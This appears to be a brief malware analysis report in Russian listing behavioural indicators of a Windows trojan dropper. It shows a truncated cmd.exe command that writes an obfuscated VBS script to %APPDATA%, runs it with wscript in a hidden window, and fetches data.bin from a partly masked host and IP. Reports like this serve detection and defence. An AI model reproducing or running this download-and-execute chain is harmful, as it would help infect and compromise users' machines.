Техническая информация
- '<SYSTEM32>\cmd.exe' /V /C set "CWTg=%APPDATA%\%RANDOM%.vbs" && (for %i in ("DIm IH" "SuB YRKuAE(UC8)" "NKHTRsj=8" "dIM IB" "IJXlUT=83" "NENz="FRsB6m"" "XOki6=56" "sEt IB=cReaTEoBjeCt(XLh2IP("13370D722F68010730530C...
- %APPDATA%\9891.vbs
- 'pa###louf.com':80
- '20#.#7.8.251':80
- http://pa###louf.com/data.bin
- DNS ASK pa###louf.com
- '<SYSTEM32>\wscript.exe' "%APPDATA%\9891.vbs"
- '<SYSTEM32>\cmd.exe' /V /C set "CWTg=%APPDATA%\%RANDOM%.vbs" && (for %i in ("DIm IH" "SuB YRKuAE(UC8)" "NKHTRsj=8" "dIM IB" "IJXlUT=83" "NENz="FRsB6m"" "XOki6=56" "sEt IB=cReaTEoBjeCt(XLh2IP("13370D722F68010730530C...' (со скрытым окном)